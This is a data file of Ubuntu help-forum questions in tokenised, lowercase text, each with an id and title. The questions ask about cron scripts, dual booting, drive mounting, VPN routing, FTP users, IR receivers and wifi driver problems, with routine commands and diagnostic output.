372776	why wo n't cron run my sh script ?	used gnome-schedule to create a script to set my headset as the fallback audio device because it keeps unsetting it when the headset gets disconnected or pc goes into sleep mode . anyway , crontab is this : shell=/bin/sh path=/bin : /sbin : /usr/bin : /usr/sbin : /home/dmitry/bin * * * * * headsetfix /home/dmitry/bin/headsetfix is # ! /bin/sh pacmd set-default-sink alsa_output.usb-logitech_inc_logitech_usb_headset_h540_00000000-00-h540.analog-stereo pacmd set-default-source alsa_input.usb-logitech_inc_logitech_usb_headset_h540_00000000-00-h540.analog-stereo it runs fine from the terminal . i 've made sure it 's chmodded to be executable , and `` which headsetfix '' , run from cron , outputs `` /home/dmitry/bin/headsetfix '' so not sure what the problem is .
372781	does pgadmin need to be configured for every desktop user ?	i have a local machine ( ubuntu 12.04 desktop ) with pgadmin3 . when i log in as a standard user on ubuntu and run pgadmin , i do n't see any server connection . so do i have to recreate a server connection for every user account on the computer ? thanks !
372782	how to boot into ubuntu after installing into a pre-installed windows 8 pc ?	i recently just installed ubuntu 13 from a usb drive . i have/had windows 8 64 bit on my desktop computer . when i restart and boot my computer , there is not an option that allows me to choose ubuntu , it goes straight to windows 8 . i understand this is a common issue . however , my main question is , how do i get to even go into ubuntu after it 's installed ? i do n't mind booting into windows 8 at first , but how can i even choose to see ubuntu now that it 's installed ?
372783	tablets compatibility	i wonder if the coming os for tablets of ubuntu will be compatible with titan tablets . i must confess that i am a little bit confused , on : the name of this os , and it release date , if someone can give me some answers i will be most thankful . my tablet is a titan 1002 me
372787	copying specific subfolders with directory structure to a new folder	i have the following directory structure : main_dir | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - subdir1 subdir2 subdir3 | | | -- -- -- -- -- - -- -- -- -- -- - -- -- -- -- -- - | | | | | | | | | fo1 fo2 f03 fo1 fo2 f03 fo1 fo2 f03 i want to copy all the subdirectories ( subdir1 , subdir2 , subdir3 ) to a new folder . but how would i only copy fo1 and fo2 folders to the new place ?
372788	lubuntu 13.10 selected lx games desktop now ca n't login	i logged out of my normal desktop and selected lx games from the dropdown list and logged back in . this led me to a black screen and now i ca n't see the login screen in order to change back to my normal desktop . on startup the machine boots normally , the lubuntu splash screen shows up , then it goes to a black screen with nothing on it - not even a mouse cursor . i can bring up a terminal using ctrl+alt+f2 . is there a way via terminal to change my desktop environment back to its previous state ? or alternatively , is there a file i can edit where my preferred desktop is stored ? ( the machine is dual-booted so i can access the lubuntu files from lxle which is installed on a second partition ) . the machine in question is a toshiba a200 laptop . update : i was unable to find a satisfactory way around this so have re-installed the os . has anyone else been adventurous enough to select the lx games desktop and if so did they have any problems ?
372789	mongodb with 13.10 service problems	i installed mongodb with the instructions here . fresh installation of ubuntu btw . it installed without error , but upon attempting to start , stop or restart the service , i got start : unknown job : mongodb invoking `` mongod '' from the commandline seems to work , as i can view statistics of mongodb fine from localhost:28017 . i 've also attempted to use the official ubuntu package `` mongodb '' instead of `` mongodb-10gen '' but no luck there either .
372790	ubuntu 12.04 - pptp vpn is the only internet access	( modified for clarity , 11/11/13 ) two distinct questions , just before the route table . i know this has been covered . i 've read dozens of posts but still have questions . i have a work server whose traffic should never leave my house without encryption . the vpn is pptp . currently i have a cron job that checks the status of the ppp0 adapter each minute . if the connection drops , which it does fairly often , it shuts key components down . it 's fairly easy to restart pptp with `` nmcli con up id 'myvpnserver ' '' but there 's no assurance it will reconnect and i need a better way to stop traffic ( other than killing apps ) when ppp0 is down . the two options i 've seen discussed are the firewall ( ufw , firestarter , iptables ) or the route tables . i could be easily swayed to consider the firewall option but i focused on the route tables since no new function needs to be started . my questions involve the way the route tables change and then specifics on rules . when i start the pptp vpn the route tables change . that suggests that if the vpn drops , the table will change back , defeating my stated intent of preventing external traffic . how can i make `` sticky '' changes to the route table that will persist even if the vpn connection drops ? perhaps the check boxes `` ignore automatically obtained routes '' or `` use this connection only for resources on it 's network '' ( which are part of the vpn configuration options ) ? it would seem that , if i can force the active vpn route table to stay in effect , even when the vpn drops , that this will effectively kill any external traffic should the vpn drop . this will give me the latitude to run a routine to restart the vpn from the command line ( assuming the route table rules do n't prevent me re-establishing the connection ) . my route table , with the vpn active is ( ip route list ) : what process is modifying the route table ( when i start the vpn ) ? any comments on what 10.10.1.1 is ? $ ip route list default dev ppp0 proto static 10.10.1.1 dev ppp0 proto kernel scope link src 10.10.1.11 vpn_server_ip_address via 192.168.1.1 dev eth0 proto static vpn_server_ip_address via 192.168.1.1 dev eth0 src 192.168.1.60 169.254.0.0/16 dev eth0 scope link metric 1000 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.60 metric 1
372791	how do i mount my external hdd with filesystem type errors ?	i am a relatively new ubuntu user and i am having some difficulty mounting my external 2tb hdd . when i first installed linux my external hdd was working just fine , however , it has stopped working and i have a lot of important files on there that i need . before my hdd would automatically mount and no worries . now , however , it does n't automatically mount and when i try to manually mount it i keep running into filesystem type errors that i ca n't seem to get past . below are images that depict my step by step process of how i am trying to mount my hdd along with the errors i am receiving . if anybody has any idea what i am doing wrong or how to correct the issue i would greatly appreciate it . step 1 ) ensure the computer recognizes my external hdd . pj @ pj : ~ $ dmesg ... [ 5790.367910 ] scsi 7:0:0:0 : direct-access wd my passport 0748 1022 pq : 0 ansi : 6 [ 5790.368278 ] scsi 7:0:0:1 : enclosure wd ses device 1022 pq : 0 ansi : 6 [ 5790.370122 ] sd 7:0:0:0 : attached scsi generic sg2 type 0 [ 5790.370310 ] ses 7:0:0:1 : attached enclosure device [ 5790.370462 ] ses 7:0:0:1 : attached scsi generic sg3 type 13 [ 5792.971601 ] sd 7:0:0:0 : [ sdb ] 3906963456 512-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 5792.972148 ] sd 7:0:0:0 : [ sdb ] write protect is off [ 5792.972162 ] sd 7:0:0:0 : [ sdb ] mode sense : 47 00 10 08 [ 5792.972591 ] sd 7:0:0:0 : [ sdb ] no caching mode page found [ 5792.972605 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 5792.975235 ] sd 7:0:0:0 : [ sdb ] no caching mode page found [ 5792.975249 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 5792.987504 ] sdb : sdb1 [ 5792.988900 ] sd 7:0:0:0 : [ sdb ] no caching mode page found [ 5792.988911 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 5792.988920 ] sd 7:0:0:0 : [ sdb ] attached scsi disk step 2 ) check if it mounted properly ( it does not ) pj @ pj : ~ $ df -ah filesystem size used avail use % mounted on /dev/sda1 682g 3.9g 644g 1 % / proc 0 0 0 - /proc sysfs 0 0 0 - /sys none 0 0 0 - /sys/fs/fuse/connections none 0 0 0 - /sys/kernel/debug none 0 0 0 - /sys/kernel/security udev 2.9g 4.0k 2.9g 1 % /dev devpts 0 0 0 - /dev/pts tmpfs 1.2g 928k 1.2g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.9g 156k 2.9g 1 % /run/shm gvfs-fuse-daemon 0 0 0 - /home/pj/.gvfs step 3 ) try mounting manually using ntfs and vfat ( both as sdb and sdb1 ) pj @ pj : ~ $ sudo mount /dev/sdb /media/passport/ ntfs signature is missing . failed to mount '/dev/sdb ' : invalid argument the device '/dev/sdb ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? pj @ pj : ~ $ sudo mount /dev/sdb1 /media/passport/ ntfs signature is missing . failed to mount '/dev/sdb1 ' : invalid argument the device '/dev/sdb1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? pj @ pj : ~ $ sudo mount -t ntfs /dev/sdb /media/passport/ ntfs signature is missing . failed to mount '/dev/sdb ' : invalid argument the device '/dev/sdb ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? pj @ pj : ~ $ sudo mount -t vfat /dev/sdb /media/passport/ mount : wrong fs type , bad option , bad superblock on /dev/sdb , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so pj @ pj : ~ $ sudo mount -t ntfs /dev/sdb1 /media/passport/ ntfs signature is missing . failed to mount '/dev/sdb1 ' : invalid argument the device '/dev/sdb1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? pj @ pj : ~ $ sudo mount -t vfat /dev/sdb1 /media/passport/ mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so
372796	belkin f7d4101 wireless usb not working	i did get the wireless driver installed using ndiswrapper-1.58 . but my network is not working . lsusb reports the device name to be 050d:615a .
372798	what do i do with the recovered lost partition	i recovered my lost ubuntu 949 gb partition and it is on the launcher below the os file when running the live cd . how to i integrate it into a running ubuntu program ?
372800	how do i burn a bootable cd on fedora	i have a fedora system i have download ubuntu i want to write the iso image to a blamk cd so i can install it on another ( windows computer ) thats sick ( windows is corrupt ) what command line options should i use ( on the fedora machine ) to write a bootable image to the cd so that when the windows box is booted it will see an iso image and boot i do n't want simple answers .
372801	grub installed on usb drive	i think grub has been installed on my usb drive . what is the fastest approach to solving my issue ? i have reinstalled it multiple times now waiting for it after i restart to say remove usb drive
372804	installation of ubuntu ( edubuntu , kubuntu , lubuntu , xubuntu , ubuntu-gnome , ubuntu-server ) saucy in i386-desktop without internet connection	i need to install ubuntu ( edubuntu , kubuntu , lubuntu , xubuntu , ubuntu-gnome , ubuntu-server ) saucy in i386-desktop without internet connection . i read alternate-cd has been stopped from saucy . is there way to download the packages via script and install it ( packages containing all software of above cds ) . live-dvd/cd of any version mentioned above containing casper files ( pre-installed ) , but i want to download the packages from internet and install it in the pc without internet .
372808	how to apply trim to an ntfs partition on an ssd drive ?	i have ubuntu 13.10 and windows 7 installed in dual boot on a single ssd . in addition they share an ntfs partition where i put all my data and documents . how can i apply trim to this partition ?
372810	how to prevent script not to stop after apt-get ?	i keep some bash snippets and copy & paste them when i needed for management . but i discovered apt-get cancels script execution . here 's my script where problematic . apt-get -y install gcc g++ make cmake perl cd ~/ mkdir t1 cd t1 i copy & paste this script on os x terminal to ubuntu 12.04 lts server ( fresh install on vm ) script always stop after apt-get finished . i run this command with root account like this . ssh user1 @ server < passwordâś > sudo su < passwordâś > apt-get -y install gcc g++ make cmake perl cd ~/ mkdir t1 cd t1 can this be a problem ? or why my script stops after apt-get finished , and how to make it to continue ?
372811	forbidden folder name in apache ?	i have a little web server i run to help me at work . in an effort to neaten up the internal bits , i made a folder named `` doc '' for documents . when i try to navigate to that folder i get you do n't have permission to access /doc/ on this server . so then , i looked at the permissions : drwxrwxr-x 2 j0h j0h 4096 nov 7 22:46 doc/ drwxrwxr-x 5 j0h j0h 4096 nov 6 12:35 ece/ drwxrwxr-x 2 j0h j0h 4096 nov 6 12:35 exe/ permissions of `` doc '' looks legit . ece/ and exe both work , and have the same permissions . so then i changed the name of the folder doc to docs and it works . so evidently the folder-name doc is a black listed folder name ? is that right ? what is going one here ?
372815	installing ftp and adding user to ftp account	i installed ftp on a ubuntu server and now want to add a user . i am using this tutorial : http : //www.debian-administration.org/articles/383 everything was working fine but i stuck on the step of adding user . when i did this : # sudo pure-pw useradd remo -u ftpuser -g ftpgroup -d /home/pubftp/remo -n 10 it gives me error `` you must give nonroot uid and gid '' . i thought to chek the uid and gid of the user and put it in command but the user is not created yet . so ca n't get its uid . how to do it friends ?
372817	nautilus not generating thumbnails in 13.10	like the title says , nautilus is not generating thumbnails for any file types ( pictures , documents , pdf , etc ) after a clean install of 13.10 . i have checked the preferences and it is set to always generate thumbnails . help please !
372825	apahce website - uploading files and download	i just recently made an apache webserver for uploading my files . the website ip is 173.65.17.127 . i 'd like to upload files and be able to download them remotely , i got mysql , apache , and php aswell as phpmyadmin . i looked on the internet and i ca n't find a way to make my site a cloud for uploads and downloads ... please help
372828	remove the file but still located	ive save the file wejnswpwhitespacefix.php in /var/www/trytry/ i deleted the file wejnswpwhitespacefix.php root @ mai : /var/www/trytry $ rm wejnswpwhitespacefix.php the when i type locate wejnswpwhitespacefix.php root @ mai : /var/www/trytry $ locate wejnswpwhitespacefix.php i still locate it : /var/www/trytry/wejnswpwhitespacefix.php the i try to remove the file again : root @ mai : /var/www/trytry $ rm wejnswpwhitespacefix.php rm : can not remove `wejnswpwhitespacefix.php ' : no such file or directory please help
372831	how to config lx-games session in lubuntu ?	i want to change the backgroud in lx-games xsession , lubuntu 13.10 . but i do n't know how to config the xsession . maybe there is a profile for lx-games xsession , but where is it ? any idea ? thank u .
372835	ehome ir receiver and ubuntu 13 - any one have this working ?	i have a `` generic '' usb ir receiver i purchased off of ebay to make my life a little easier with xbmc on my ubuntu box . i am currently running 13.10 and have never tried nor have any knowledge of ir in ubuntu . i know of lirc , and i know a lot of it is now included in the kernel . my understanding is that lirc in basic terms maps pulses from an remote control to functions - like keyboard or mouse clicks . it is also my understanding that i might still need a driver or something for my device . lsusb shows the device as : bus 006 device 003 : id 147a : e016 formosa industrial computing , inc. ehome infrared receiver dmesg shows the following pertaining to the device : [ 43635.311985 ] usb 6-2 : usb disconnect , device number 2 [ 43641.344387 ] usb 6-2 : new full-speed usb device number 3 using ohci-pci [ 43641.543454 ] usb 6-2 : new usb device found , idvendor=147a , idproduct=e016 [ 43641.543467 ] usb 6-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 43641.543473 ] usb 6-2 : product : ehome infrared transceiver [ 43641.543478 ] usb 6-2 : manufacturer : formosa21 [ 43641.543483 ] usb 6-2 : serialnumber : fm000623 [ 43641.555736 ] registered ir keymap rc-rc6-mce [ 43641.555968 ] input : media center ed . ehome infrared remote transceiver ( 147a : e016 ) as /devices/pci0000:00/0000:00:12.0/usb6/6-2/6-2:1.0/rc/rc2/input15 [ 43641.556221 ] rc2 : media center ed . ehome infrared remote transceiver ( 147a : e016 ) as /devices/pci0000:00/0000:00:12.0/usb6/6-2/6-2:1.0/rc/rc2 [ 43641.556584 ] input : mce ir keyboard/mouse ( mceusb ) as /devices/virtual/input/input16 [ 43641.557186 ] rc rc2 : lirc_dev : driver ir-lirc-codec ( mceusb ) registered at minor = 0 [ 43641.731965 ] mceusb 6-2:1.0 : registered formosa21 ehome infrared transceiver with mce emulator interface version 1 [ 43641.731978 ] mceusb 6-2:1.0 : 2 tx ports ( 0x0 cabled ) and 2 rx sensors ( 0x0 active ) ( excuse the double spacing , but i had to put in extra cr/lf using `` enter '' or the entire thing was just one long unreadable string ) . when i connect the same ir receiver to a raspberry pi running openelec/xbmc there is no flashing led unless i press a remote button , and the device works . in ubuntu , the led is constantly blinking , and nothing happens when i press a remote key . i tried the command line program to test but it never echoes anything back to the terminal window . i believe it must need some sort of driver or something else , but i am completely in the dark on this . if it matters i also have : - logitech wireless keyboard/mouse usb receiver - tenda usb wireless adapter and ... ..i 've also noticed some errors now that show in dmesg that seem to somehow related to hdmi if that makes any sense : 46721.144731 ] hdmi : eld buf size is 0 , force 128 [ 46721.144749 ] hdmi : invalid eld data byte 0 [ 46721.444025 ] hdmi : eld buf size is 0 , force 128 [ 46721.444061 ] hdmi : invalid eld data byte 0 [ 46721.743375 ] hdmi : eld buf size is 0 , force 128 [ 46721.743411 ] hdmi : invalid eld data byte 0 [ 46722.043092 ] hdmi : eld buf size is 0 , force 128 [ 46722.043118 ] hdmi : invalid eld data byte 0 [ 46722.343086 ] hdmi : eld buf size is 0 , force 128 [ 46722.343122 ] hdmi : invalid eld data byte 0 [ 46722.642517 ] hdmi : eld buf size is 0 , force 128 [ 46722.642574 ] hdmi : invalid eld data byte 0 [ 46722.942459 ] hdmi : eld buf size is 0 , force 128 [ 46722.942485 ] hdmi : invalid eld data byte 0 [ 46723.242103 ] hdmi : eld buf size is 0 , force 128 [ 46723.242129 ] hdmi : invalid eld data byte 0 [ 46723.541877 ] hdmi : eld buf size is 0 , force 128 [ 46723.541923 ] hdmi : invalid eld data byte 0 [ 58366.651954 ] hdmi : eld buf size is 0 , force 128 [ 58366.651980 ] hdmi : invalid eld data byte 0 [ 58366.951523 ] hdmi : eld buf size is 0 , force 128 [ 58366.951549 ] hdmi : invalid eld data byte 0 [ 58367.251075 ] hdmi : eld buf size is 0 , force 128 [ 58367.251121 ] hdmi : invalid eld data byte 0 [ 58367.550517 ] hdmi : eld buf size is 0 , force 128 [ 58367.550563 ] hdmi : invalid eld data byte 0 [ 58367.850219 ] hdmi : eld buf size is 0 , force 128 [ 58367.850256 ] hdmi : invalid eld data byte 0 [ 58368.150160 ] hdmi : eld buf size is 0 , force 128 [ 58368.150185 ] hdmi : invalid eld data byte 0 [ 58368.449544 ] hdmi : eld buf size is 0 , force 128 [ 58368.449570 ] hdmi : invalid eld data byte 0 [ 58368.749583 ] hdmi : eld buf size is 0 , force 128 [ 58368.749629 ] hdmi : invalid eld data byte 0 [ 58369.049280 ] hdmi : eld buf size is 0 , force 128 [ 58369.049326 ] hdmi : invalid eld data byte 0 [ 58394.706273 ] hdmi : eld buf size is 0 , force 128 [ 58394.706300 ] hdmi : invalid eld data byte 0 [ 58394.706350 ] hdmi : eld buf size is 0 , force 128 [ 58394.706367 ] hdmi : invalid eld data byte 0 [ 58395.003032 ] hdmi : eld buf size is 0 , force 128 [ 58395.003058 ] hdmi : invalid eld data byte 0 [ 58395.302680 ] hdmi : eld buf size is 0 , force 128 [ 58395.302705 ] hdmi : invalid eld data byte 0 [ 58395.602442 ] hdmi : eld buf size is 0 , force 128 [ 58395.602477 ] hdmi : invalid eld data byte 0 [ 58395.902143 ] hdmi : eld buf size is 0 , force 128 [ 58395.902179 ] hdmi : invalid eld data byte 0 [ 58396.201839 ] hdmi : eld buf size is 0 , force 128 [ 58396.201875 ] hdmi : invalid eld data byte 0 [ 58396.501538 ] hdmi : eld buf size is 0 , force 128 [ 58396.501574 ] hdmi : invalid eld data byte 0 [ 58396.801232 ] hdmi : eld buf size is 0 , force 128 [ 58396.801268 ] hdmi : invalid eld data byte 0 [ 58397.100583 ] hdmi : eld buf size is 0 , force 128 [ 58397.100627 ] hdmi : invalid eld data byte 0 [ 63095.766042 ] systemd-hostnamed [ 8875 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! dave @ davepc : ~ $ edit : maybe another way to look at this would be what does ubuntu do or not do that openelec does or does n't do ( on raspberry pi ) such that it works in openelec but not in ubuntu ?
372839	install nvidia-cuda-toolkit removes a lot of packages - ubuntu 13.04	my os is kubuntu 13.04 64 bits , and when i try to install nvidia-cuda-toolkit ( which i really need ) the following packages need to be removed : ia32-libs ia32-libs-multiarch : i386 libgl1-mesa-glx : i386 libglu1-mesa : i386 libqt4-opengl : i386 libqtwebkit4 : i386 libvisual-0.4-plugins : i386 skype skype-bin : i386 teamviewer virtualgl-libs : i386 virtualgl-libs-ia32 : i386 the big problem is skype , which i really uses a lot , but it seems that the problem is all the 32 bits compatible packages . anyone knows if there is a workaround to keep skype and the other packages installed ? thanks a lot and best regards . mauro .
372842	13.10 - weird wifi connection problems - wmp300n - broadcom bcm4321	just installed 13.10 on my desktop and i really like it . after having problems with getting the wifi to work , i installed it connected to the internet with an ethernet cable and added in the 3rd party software and updates as per the installation procedure . after installation was completed , i saw the wifi icon in the upper right hand corner , but it was not seeing any wifi networks . some googling brought me to use the 'additional drivers ' application . it found the wmp300n broadcom bdm4321 based pci wifi card and installed the proprietary broadcom sta wireless driver , which may have been installed before . i 'm not sure . here is the weird part : when i start my system , wifi seems to be in some sort of suspended state where the system sees that the card exists but the card will not detect any wifi networks . it will work after booting once i 'additional drivers ' application and then start firefox . i know it seems weird , but this is the process i 've got down to get the card to recognize wifi networks . after those applications are open for a few seconds , the card starts to function like normal ( although maintaining the wifi connection is problem but most likely a seperate issue ) . the reason this is a problem is because this is supposed to just be a headless box managed through ssh . here are the readouts from the common network diagnosis programs before i open 'additional drivers ' and 'firefox ' . all commands were done with sudo . lspci 00:00.0 host bridge : intel corporation 82g35 express dram controller ( rev 03 ) 00:01.0 pci bridge : intel corporation 82g35 express pci express root port ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 02 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 92 ) 00:1f.0 isa bridge : intel corporation 82801ir ( ich9r ) lpc interface controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801ir/io/ih ( ich9r/do/dh ) 6 port sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 02 ) 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 02:00.0 ethernet controller : qualcomm atheros attansic l1 gigabit ethernet ( rev b0 ) 03:00.0 ide interface : jmicron technology corp. jmb368 ide controller 05:00.0 network controller : broadcom corporation bcm4321 802.11b/g/n ( rev 01 ) 05:03.0 firewire ( ieee 1394 ) : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev c0 ) - lshw *-network description : ethernet interface product : attansic l1 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : b0 serial : 00:22:15:00 : a8:12 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1 driverversion=2.1.3 latency=0 link=no multicast=yes port=twisted pair resources : irq:46 memory : feac0000-feafffff memory : feaa0000-feabffff *-network description : wireless interface product : bcm4321 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth1 version : 01 serial : 00:23:69 : d8:2b:16 width : 32 bits clock : 33mhz capabilities : bus_master ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) latency=64 multicast=yes wireless=ieee 802.11abg resources : irq:16 memory : febfc000-febfffff - ifconfig eth0 link encap : ethernet hwaddr 00:22:15:00 : a8:12 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr 00:23:69 : d8:2b:16 inet6 addr : fe80 : :223:69ff : fed8:2b16/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:24 errors:0 dropped:0 overruns:0 frame:0 tx packets:24 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1856 ( 1.8 kb ) tx bytes:1856 ( 1.8 kb ) - iwconfig eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off - iwlist scan eth1 no scan results - here are the various commands after i open 'additional drivers ' and 'firefox' lspci 00:00.0 host bridge : intel corporation 82g35 express dram controller ( rev 03 ) 00:01.0 pci bridge : intel corporation 82g35 express pci express root port ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 02 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 02 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 92 ) 00:1f.0 isa bridge : intel corporation 82801ir ( ich9r ) lpc interface controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801ir/io/ih ( ich9r/do/dh ) 6 port sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 02 ) 01:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 02:00.0 ethernet controller : qualcomm atheros attansic l1 gigabit ethernet ( rev b0 ) 03:00.0 ide interface : jmicron technology corp. jmb368 ide controller 05:00.0 network controller : broadcom corporation bcm4321 802.11b/g/n ( rev 01 ) 05:03.0 firewire ( ieee 1394 ) : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev c0 ) - lshw *-network description : ethernet interface product : attansic l1 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : b0 serial : 00:22:15:00 : a8:12 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1 driverversion=2.1.3 latency=0 link=no multicast=yes port=twisted pair resources : irq:46 memory : feac0000-feafffff memory : feaa0000-feabffff *-network description : wireless interface product : bcm4321 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth1 version : 01 serial : 00:23:69 : d8:2b:16 width : 32 bits clock : 33mhz capabilities : bus_master ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) ip=192.168.1.103 latency=64 multicast=yes wireless=ieee 802.11abg resources : irq:16 memory : febfc000-febfffff - ifconfig eth0 link encap : ethernet hwaddr 00:22:15:00 : a8:12 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr 00:23:69 : d8:2b:16 inet addr:192.168.1.103 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :223:69ff : fed8:2b16/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:85 errors:0 dropped:0 overruns:0 frame:11901 tx packets:132 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:52641 ( 52.6 kb ) tx bytes:19058 ( 19.0 kb ) interrupt:16 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:76 errors:0 dropped:0 overruns:0 frame:0 tx packets:76 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:6084 ( 6.0 kb ) tx bytes:6084 ( 6.0 kb ) - iwconfig eth1 ieee 802.11abg essid : '' bu '' mode : managed frequency:2.447 ghz access point : 00:26 : f2:1f:81:02 bit rate=54 mb/s tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=59/70 signal level=-51 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 - iwlist scan a lot of ssids found ! - i 'd like to have this problem fixed , but i 'm not quite sure where to go . been googling a lot and ca n't seem to find anyone else with this problem .
